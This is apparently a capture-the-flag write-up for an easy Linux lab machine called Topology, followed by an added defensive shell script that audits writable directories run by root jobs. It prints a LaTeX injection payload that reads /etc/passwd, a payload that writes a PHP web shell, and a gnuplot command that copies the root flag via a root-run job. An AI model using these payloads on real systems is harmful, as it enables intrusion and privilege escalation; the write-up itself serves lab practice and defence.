Topology
- Date completed: 2023-06-15
- Difficulty: Easy
- OS: Linux
User flag
Initial nmap:
$ nmap -sC -sV 10.10.11.217
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-14 10:07 CDT
Nmap scan report for 10.10.11.217
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dcbc3286e8e8457810bc2b5dbf0f55c6 (RSA)
| 256 d9f339692c6c27f1a92d506ca79f1c33 (ECDSA)
|_ 256 4ca65075d0934f9c4a1b890a7a2708d7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Miskatonic University | Topology Group
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.65 seconds
The page has a link to http://latex.topology.htb.
That site renders LaTeX equations to images using URLs of the form http://latex.topology.htb/equation.php?eqn=\int_{1}^{\infty}{x^2\+dx}&submit=
Files can be read using this payload (only shows first line):
\newread\file \openin\file=/etc/passwd \read\file to\line \text{\line} \closein\file
As this site uses PHP, it may be possible to use a webshell.
Payload?:
\catcode`#=0 #newwrite#outfile #openout#outfile=testit.php #write#outfile{<?php system($_GET['cmd']); ?>} #closeout#outfile
Using the webshell, found a hash at /var/www/dev/.htpasswd, cracked using hashcat.
Logged in with ssh and got the user flag!
Root flag
The user vdaisley has no sudo permissions.
Running pspy on the machine shows that the command find /opt/gnuplot -name *.plt -exec gnuplot {} ; is run repeatedly.
The /opt/gnuplot directory is writable:
vdaisley@topology:~$ ls -la /opt/
total 12
drwxr-xr-x 3 root root 4096 May 19 13:04 .
drwxr-xr-x 18 root root 4096 Jun 12 10:37 ..
drwx-wx-wx 2 root root 4096 Jun 14 07:45 gnuplot
Gnuplot allows a system command, which is used to run shell commands. Thus a new file can be created and added to the directory:
echo 'system "cat /root/root.txt > /dev/shm/.a"' > /opt/gnuplot/aaaa1.plt
Then we can get the root flag.
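From the defender's side, the root step works only because a root-run job executes every .plt file in a directory that other users can write to (drwx-wx-wx). The following added example, which is not part of the original write-up, audits such a directory. It assumes GNU find and stat as shipped on Ubuntu, and the function name audit_job_dir and its output labels are hypothetical.

```shell
#!/bin/sh
# Added example: audit a directory whose scripts are executed by a scheduled
# job running as another account (root by default), as with /opt/gnuplot.
# Assumes GNU find/stat. audit_job_dir is a hypothetical helper name.

# audit_job_dir DIR [OWNER_UID]
# Prints one finding per line; returns 0 if clean, 1 if anything was found.
audit_job_dir() {
    dir=$1
    owner=${2:-0}          # numeric uid the job runs as; 0 = root
    findings=0

    if [ ! -d "$dir" ]; then
        echo "MISSING $dir"
        return 1
    fi

    # The directory must belong to the account that runs the job.
    actual=$(stat -c %u "$dir")
    if [ "$actual" != "$owner" ]; then
        echo "OWNER $dir owned by uid $actual, expected uid $owner"
        findings=1
    fi

    # Group or other write permission (e.g. drwx-wx-wx) lets any local
    # user add a script that the job will then execute.
    if [ -n "$(find "$dir" -maxdepth 0 -perm /022)" ]; then
        echo "WRITABLE $dir mode $(stat -c %a "$dir") allows group/other write"
        findings=1
    fi

    # Scripts already inside that are foreign-owned or group/other writable.
    bad=$(find "$dir" -type f -name '*.plt' \( ! -user "$owner" -o -perm /022 \))
    if [ -n "$bad" ]; then
        echo "$bad" | sed 's/^/SCRIPT /'
        findings=1
    fi

    return "$findings"
}
```

A clean result for this host would require /opt/gnuplot to be owned by root with mode 755 or stricter, so that only root can place files the job will run.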